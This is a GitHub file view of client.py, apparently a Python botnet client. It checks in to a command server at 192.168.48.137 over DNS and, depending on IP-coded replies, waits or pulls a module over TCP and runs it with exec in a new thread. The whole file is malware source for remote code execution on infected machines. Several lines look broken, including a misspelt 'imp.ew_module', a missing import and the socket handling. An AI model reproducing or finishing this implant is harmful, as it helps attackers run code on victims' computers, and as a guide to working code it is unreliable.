-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathclient.py
More file actions
executable file
·50 lines (36 loc) · 1.31 KB
/
client.py
File metadata and controls
executable file
·50 lines (36 loc) · 1.31 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import dnslib
import socket
import time
import os
import subprocess
import threading
def loadModule(modBytes):
loadedModule = imp.ew_module('loadedModule')
exec(modBytes, loadedModule.__dict__)
loadedModule.shellModule()
d = dnslib.DNSRecord.question("botnet.checkin.com")
serverAddressPort = ("192.168.48.137", 53)
UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
while True:
UDPClientSocket.sendto(d.pack(), serverAddressPort)
response, addr = UDPClientSocket.recvfrom(1024)
dnsResponse = dnslib.DNSRecord.parse(response.strip())
if "67.79.79.76" in str(dnsResponse.rr[0]):
#checked in, just wait and loop again
time.sleep(60)
continue
elif "76.79.65.68" in str(dnsResponse.rr[0]):
## open tcp socket to get module and load it
port = str(dnsResponse.rr[1]).split()[-1]
modTcpSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
addr = ('localhost', port)
modTcpSocket.bind(addr)
moduleDirty = modTcpSocket.recvfrom(1024)
modTcpSocket.close()
module = moduleDirty.strip()
threading.Thread(target=loadModule, args=(module)).start()
continue
else:
## unexpected result - just wait and try again
time.sleep(60)
continue